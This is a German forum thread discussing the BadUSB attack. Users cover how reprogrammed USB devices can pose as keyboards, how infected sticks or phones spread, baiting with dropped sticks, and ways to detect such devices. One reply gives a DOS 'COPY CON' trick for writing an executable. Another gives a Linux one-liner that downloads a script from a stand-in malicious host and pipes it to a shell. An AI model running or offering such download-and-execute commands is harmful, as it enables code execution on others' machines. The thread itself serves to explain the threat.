http://www.zeit.de/digital/datenschutz/2014-10/badus…
Hallo,
über diesen üblen Hack wurde schon vor einigen Monaten berichtet, ich habe das aber immer noch nicht ganz verstanden.
Muss jemand, wenn er meinen PC infizieren will, einmal an meinem PC gesessen und das per Stick reingespielt haben? Oder kann mich das, wenn es erst einmal verbreitet ist, wie Viren oder Trojaner, auch unbemerkt über das Web erreichen?
Grüße
Carsten
Hallo Carsten,
Muss jemand, wenn er meinen PC infizieren will, einmal an
meinem PC gesessen und das per Stick reingespielt haben?
Ja, wobei das modifizierte USB-Teil an deinem Computer eingesteckt werden muss.
Wobei, es muss kein USB-Stick sein. Irgendein USB-Gerät mit modifizierter Firmware reicht also.
Es ist aber denkbar, dass ich, irgendwo unterwegs, deinen USB-Stick, Dein Handy, Fotoapparat usw., in die Finger bekomme und das Teil schnell modifiziere (Firmware Update).
Wenn du das Teil zu Hause ansteckst …
Oder
kann mich das, wenn es erst einmal verbreitet ist, wie Viren
oder Trojaner, auch unbemerkt über das Web erreichen?
Ist im Prinzip auch möglich. Irgendwie kommt die Malware auf deinen PC oder als App auf dein Smartphone, Tablett usw. und modifiziert dann die angeschlossen USB-Geräte.
Wird dann so ein USB-Gerät an einem anderen PC angesteckt, ist auch dieser versaubeutelt …
Das Grundübel versteckt sich in der Idee von „Plug n Play“, Gerät anstecken und der Rest geht automatisch. Dabei muss das neue Gerät angeben, was zu tun ist, damit es zum laufen kommt, aber das neue Gerät kann eben auch gezielt falsche Angaben machen …
MfG Peter(TOO)
Nur die halbe Geschichte
Wobei, es muss kein USB-Stick sein. Irgendein USB-Gerät mit
modifizierter Firmware reicht also.
Wobei das nur der zweite Teil des Angriffs ist.
Dieser Angriff läuft auf der Ebene der Peripheriegeräte ab. Quasi alle modernen Betriebssysteme können heute mit USB-Tastaturen arbeiten und binden diese automatisch ein. Das ist auch eigentlich eine vernünftige Angelegenheit, weil die Tastatur halt das primäre Eingabegerät ist. (Den umgekehrten Fehler gab es vor 15 Jahren, dass PCs für Industrieaufgaben nicht ohne Tastatur liefen. Link zum Bild)
Ist aber eine Tastatur am PC angeschlossen, gibt es unter quasi jedem üblichen Betriebssystem Tastaturbefehle, um mit den Rechten des angemeldeten Benutzers böse Dinge anzustellen.
So ein PC hat halt keine Augen, um zu erkennen, dass etwas wirklich eine Tastatur ist. Von daher kann jedes böse Gerät sich am USB-Port als Tastatur tarnen. Es muss halt nur exakt so kommunizieren wie eine normale Tastatur.
Bislang war natürlich die Schwelle zum Missbrauch sehr hoch. Denn der Angreifer musste ein eigenes Gerät entwickeln, war also eher was für CIA, NSA & Co, die mal locker fünf- bis sechsstellige Summen für Angriffsmittel ausgeben können.
Große Bedeutung hat die Bedrohung jetzt erreicht, weil ein erster Angriffsteil neu hinzugekommen ist. Ein sehr verbreiteter Chipsatz für USB-Sticks wurde gehackt. Und damit kann man jetzt ohne Zusatzkosten normale USB-Sticks zu Angriffsmitteln umbauen. Und sogar noch mehr: Man kann die Angriffsfirmware auf USB-Sticks des Opfers kopieren.
Erst dadurch wird der bekannte Ansatz einer vorgetäuschten Tastatur finanziell für gewöhnliche Cyberkriminelle interessant.
Ich kenne mich auf dem Sektor nicht gut aus, aber über programmierbare Kleinstgeräte wie Rasberrys oder manipulierbare Hardwaretreiber bei Smartphone wären ähnliche Angriffe denkbar.
Ciao, Allesquatsch
Dieser Angriff läuft auf der Ebene der Peripheriegeräte ab. Quasi alle modernen
Betriebssysteme können heute mit USB-Tastaturen arbeiten und binden diese
automatisch ein. Das ist auch eigentlich eine vernünftige Angelegenheit, weil die Tastatur
halt das primäre Eingabegerät ist. (Den umgekehrten Fehler gab es vor 15 Jahren, dass
PCs für Industrieaufgaben nicht ohne Tastatur liefen. Link zum Bild)
Ob und was für Zusatzgeräte am Schreibtisch-Computer bei der Inbetriebahme eingesteckt sein müssen,entscheidet das jeweilige BIOS des Rechners.
Bei Rechnern,die als Server vorgesehen sind,wird eine fehlende Tastatur,Maus oder Bildschirm nicht als Fehler angesehen und der Rechner fährt hoch.
Industrie-PC sind oft nichts weiter als Einschübe oder Einbauten wie dieser zum B.
http://www.admost.de/hutschienen-pc/artila-matrix-ar…
und haben vor Ort weder Tastatur noch Bildschirm.
Hi,
jemand „verliert“ seinen USB Stick auf dem Parkplatz einer Firma. Vorzugsweise morgens wenn die Leute in die Firma rein gehen.
Ein Mitarbeiter der Firma findet den USB-Stick und weil dieser neugierig ist steckt er ihn an einen Computer der Firma.
Der USB-Stick vollzieht seine bösen Machenschaften und sieht dabei aus wie ein leerer USB-Stick(oder es ist nur Musik drauf oder etwas anderes unverdächtiges).
Der Mitarbeiter merkt idealerweise nicht, dass er gerade etwas böses installiert hat.
Er schmeißt den Stick in eine Schublade oder gibt ihn idealerweise an andere Mitarbeiter zur Benutzung weiter oder er nimmt ihn mit nach hause.
MFG
Servus,
gibt es denn heute noch Betriebe, in denen auf die Verwendung von USB-Sticks, die man nicht persönlich aus den Händen z.B. des Admins erhält, nicht die Prügelstrafe zweiten Grades steht?
Bei denen täte ich sagen: Selber schuld, nicht anders verdient.
Schöne Grüße
MM
Hi,
gibt es denn heute noch Betriebe, in denen auf die Verwendung
von USB-Sticks, die man nicht persönlich aus den Händen z.B.
des Admins erhält, nicht die Prügelstrafe zweiten Grades
steht?
mal abgesehen davon, dass dies nur Szeanario1 ist und je nach Sicherheitsmaßnahmen im Unternehmen andere Verbreitungswege Anwendung finden.
Bei sehr vielen Unternehmen funktioniert dieses Szenario tadellos.
Ich habe mal ein Paper darüber gelesen wo ein Sicherheitsunternehmen dies geprüft hat und die Zahlen waren erschreckend.
Man kann das Ganze noch beliebig verfeinern indem man zB in Erfahrung bringt welche USB-Sticks in einem Unternehmen im Umlauf sind und den infizierten Stick in einem entsprechenden Gehäuse unterbringt. Und wer denkt schon an Manipulation wenn er einen in Originalverpackung eingeschweißten Stick findet.
Man muss sich im klaren darüber sein, dass Personen oder Gruppen die bereit sind so weit zu gehen auch nicht vor Tricks wie Taschendiebstahl, Manipulation und Taschendiebstahlrückgabe halt machen.
Auch Sachen von denen man denkt, dass sie nur in Filmen wie James Bond und Konsorten existieren, können wahr sein.
MFG
So what?
gibt es denn heute noch Betriebe, in denen auf die Verwendung
von USB-Sticks, die man nicht persönlich aus den Händen z.B.
des Admins erhält, nicht die Prügelstrafe zweiten Grades
steht?
In dieser Beziehung konkurriert das mit dem Bestätigungshäkchen, dass man die Geschäftsbedingungen oder die Enduserlizenz gelesen hat: in der Praxis unwirksam.
Tatsächlich würde ich sogar annehmen, dass die Mehrzahl der IT-Führungskräfte diesbezüglich nicht wirklich sensibilisiert sind. Auf einem Fragebogen würden sie es zwar richtig ankreuzen, aber in der Praxis ignorieren. Sicherheit ist wichtig, aber nur solange man den Chef nicht warten lässt.
Ciao, Allesquatsch
Moin!
Ist aber eine Tastatur am PC angeschlossen, gibt es unter quasi jedem üblichen Betriebssystem Tastaturbefehle, um mit den Rechten des angemeldeten Benutzers böse Dinge anzustellen.
Als da wären?
Ich vermisse da halbwegs konkrete und nachvollziehbare Beispiele…
lg, mabuse
Hallo mabuse,
Ist aber eine Tastatur am PC angeschlossen, gibt es unter quasi jedem üblichen Betriebssystem Tastaturbefehle, um mit den Rechten des angemeldeten Benutzers böse Dinge anzustellen.
Als da wären?
Ich vermisse da halbwegs konkrete und nachvollziehbare
Beispiele…
Nicht elegant, aber funktioniert unter Windows:
Dosbox öffnen.
COPY CON: Virus.exe
(Binärdaten senden)
^C
Virus
Es gab, unter DOS, Zeiten, da hat man so kleine .COM-Programme eingegeben.
Ich kann natürlich auch meinen Virus auch im USB-Laufwerksbereich einblenden und starten.
Oder den Browser starten und auf eine manipulierte Seite leiten.
MfG Peter(TOO)
Hi,
und was machst Du z.B. mit Leuten die gar nicht im Büro sind und der Kunde sagt „Ich habe das auf meinem Stick, zieh Dir das mal eben runter“? z.B. auf einer Geschäftsreise?
Gruss
K
Hallo Peter,
Nicht elegant, aber funktioniert unter Windows:
Dosbox öffnen.
COPY CON: Virus.exe
(Binärdaten senden)
^C
Virus
Aber nur in der Theorie.
Zunächst mal ist das, genauso wie
Oder den Browser starten und auf eine manipulierte Seite leiten.
sichtbar.
Und jeder User, der auch nur halbwegs mitdenkt, sollte sich dann denken können, das da irgendwas faul ist.
Und zweitens gilt hier - wie bei allen anderen vergleichbaren Lücken:
Dieser Virus (oder manipulierte Seite) laufen nur im Kontext des Benutzers. F**ken kann man so also wie immer nur die Deppen, die als Administrator arbeiten (oder unter diesen neumodischen Win-Systemen ohne Nachdenken bei jeder Anfrage das Admin-Passwort eintippen…).
Ich seh da immer noch kein wirkliches Bedrohungspotential bei Leuten, die mit minimaler Intelligenz gesegnet sind, bzw. von ihrem Administrator entsprechend geschult wurden.
Schönes Wochenende wünsch ich dir,
mabuse
gibt es denn heute noch Betriebe, in denen auf die Verwendung von USB-Sticks, die man nicht persönlich aus den Händen z.B. des Admins erhält, nicht die Prügelstrafe zweiten Grades steht?
Oh ja, ohne Ende.
Ich hab bei uns mal versucht, die Benutzung von USB-Datenträgern per Richtlinie zu unterbinden.
Hat keine 60 Sekunden gedauert, dann brach der Shit-Storm über mich herein… nicht nur von den Sachbearbeitern, auch von der Geschäftsführung.
Letztlich bringt das auch nichts, denn auch die „genehmigten“ USB-Sticks werden zuhause in private Rechner eingestöpselt und können so mit Schadsoftware bestückt werden.
Immerhin hab ich überall den Autostart abschalten können, das bringt ja auch schon was.
Bei denen täte ich sagen: Selber schuld, nicht anders verdient.
Im Prinizp stimme ich dir zu, aber jeder Admin, der das ernsthaft durchziehen will, wird für ein Jahr Überstunden ohne Ende machen (müssen). Ohne solche Sticks läuft heutzutage kaum noch was.
lg, mabuse
Hallo mabuse,
Aber nur in der Theorie.
Zunächst mal ist das, genauso wieOder den Browser starten und auf eine manipulierte Seite leiten.
sichtbar.
Und jeder User, der auch nur halbwegs mitdenkt, sollte sich
dann denken können, das da irgendwas faul ist.
Nicht wenn ich das Fenster so platziere, dass es ausserhalb des Bildschirms ist.
Oder die DOSbox mit -noconsole starte
http://www.dosbox.com/wiki/Usage
Dieser Virus (oder manipulierte Seite) laufen nur im Kontext
des Benutzers. F**ken kann man so also wie immer nur die
Deppen, die als Administrator arbeiten (oder unter diesen
neumodischen Win-Systemen ohne Nachdenken bei jeder Anfrage
das Admin-Passwort eintippen…).
Da hast du recht.
Ich seh da immer noch kein wirkliches Bedrohungspotential bei
Leuten, die mit minimaler Intelligenz gesegnet sind, bzw. von
ihrem Administrator entsprechend geschult wurden.
Leider gibt’s da viele Ausnahmen 
MfG Peter(TOO)
Hallo mabuse,
gibt es denn heute noch Betriebe, in denen auf die Verwendung von USB-Sticks, die man nicht persönlich aus den Händen z.B. des Admins erhält, nicht die Prügelstrafe zweiten Grades steht?
Oh ja, ohne Ende.
Ich hab bei uns mal versucht, die Benutzung von
USB-Datenträgern per Richtlinie zu unterbinden.
Nur, der Trick funktioniert mit jedem USB-Gerät, nicht mur mit Sticks.
Am einfachsten ist sicher der Zugang übers Smartphone. Das Handy kann man über fingierte Updates modifizieren. Irgendwann wird dann das Handy mal am PC angeschlossen um den Akku zu laden…
Aber auch Drucker, Tastatur, Scanner kann man im Prinzip modifizieren.
Gerade beim Drucker könnte das relativ einfach sein. Man erstellt ein Dokument, welches in Wirklichkeit ein Firmwareupdate macht.
Bis jetzt hat nur noch keiner nach Sicherheitslücken in der Firmware von Geräten gesucht…
MfG Peter(TOO)
Nachtrag
Hallo mabuse,
Eine ganz andere Möglichkeit wäre noch, wenn es Fehler wie Bufferoveruns im USB-System gibt.
MfG Peter(TOO)
Google ist Dein Freund:
Ich vermisse da halbwegs konkrete und nachvollziehbare
Beispiele…
Vermissen oder Nicht nachvollziehen?
Als Video:
http://www1.wdr.de/daserste/monitor/sendungen/usb108…
Das grundsätzliche Angriffsprinzip (was ich als zweiten Teil genannt habe) ist schon 2011 vorgeführt worden:
http://www.heise.de/security/meldung/USB-Tastatur-Em…
Der dritte Teil, die Schadfunktion, ist trivial, weil man durch Nachladen quasi alles machen kann. Sobald das Betriebssystem eine Kommandozeile bereitstellt, kann der Angreifer alles tun, was der angemeldete Benutzer kann (und über Privilegieneskalation auch mehr).
Bei Linux reicht eine Zeile:
wget http://evil.site.ru/trojan.sh --output-document= - | sh
und die Shellausgabe kann auch gleich nach dev0 geschickt werden.
Ciao, Allesquatsch
Servus,
da muss man sich eh überlegen, welche Geräte physikalisch getrennt oder sonstwie in Quarantäne betrieben werden können. Die Einfallspforte für sich alleine ist nichts Neues, dafür sollte es schon längere Zeit Konzepte in Betrieb und Unternehmen geben.
Schöne Grüße
MM
Ich hab bei uns mal versucht, die Benutzung von
USB-Datenträgern per Richtlinie zu unterbinden.Nur, der Trick funktioniert mit jedem USB-Gerät, nicht mur mit
Sticks.
Hallo Peter,
gleichwohl haben Datenträger eine ganz andere Bedrohungsqualität, da man Datenträger einfach viel leichter unterschieben kann:
Zum einen gebärt die Nutzung von USB-Sticks oder externen Festplatten oft zum normalen Ablauf. Zu anderen suggerieren bisherige Prüfmechanismen Sicherheit, obwohl die Prüfung völlig ins Leere geht, da sie sich auf das Dateisystem beschränkt.
Wenn der Angreifer helle ist, dann patch er den USB-Stick so, dass er weiterhin als USB-Stick funktioniert und die Schadfunktion nur als Schläfer ausführt. Damit gibt es kaum eine Chance, Gerät von außen zu testen.
Bei USB-Sticks ist es sicher am einfachsten, die irgendwo einzuschleusen. Solche Fälle gab es häufig mit dateibasierten Viren oder zur Fälschung von Sticke mit höherer Kapazität.
Ciao, Allesquatsch
Hallo Allesquatsch,
Wenn der Angreifer helle ist, dann patch er den USB-Stick so,
dass er weiterhin als USB-Stick funktioniert und die
Schadfunktion nur als Schläfer ausführt. Damit gibt es kaum
eine Chance, Gerät von außen zu testen.
Auffällig am modifizierten Stick ist, dass es sich nicht mur als Massenspeicher, sondern auch als HID meldet.
Dies könnte man eigentlich recht einfach, mit einem z.B. Arduino testen.
Stick einstecken und wenn er sich nicht nur als Massenspeicher meldet, könnte was faul sein …
Könnte man auch ins Betriebssystem einbauen, aber dann ist die Idee von Plug n Play im Eimer
Und der unbedarfte User klickt sowieso immer nur OK
Bei USB-Sticks ist es sicher am einfachsten, die irgendwo
einzuschleusen. Solche Fälle gab es häufig mit dateibasierten
Viren oder zur Fälschung von Sticke mit höherer Kapazität.
Ein manipuliertes Smartphone hat den Vorteil, dass es einem bestimmten User zugeordnet werden kann.
Wie ich geschrieben habe, ist eine Möglichkeit dem Teil kurz habhaft zu werden, damit man es manipulieren kann.
Eine andere Möglichkeit ist, den Besitzer dazu zu bringen, das Teil an einem, manipulierten, PC anzustecken, der dann die Modifikationen drauf lädt.
Weitere Möglichkeiten sind sich via WiFi oder Bluetooth Zugang zu verschaffen, wen das Handy nicht entsprechend gesichert ist.
Eine andere Möglichkeit ist über automatische Updates, die gibt es ja laufend, auch vom Hersteller.
Eine, technisch etwas aufwendigere Möglichkeit, ist ein Repeater, bzw. mobiler Sendemast. Das Handy loggt sich immer beim stärksten Signal ein. Dann kann man den normalen Datenstrom manipulieren, ohne, dass das der Besitzer wirklich mitbekommt.
MfG Peter(TOO)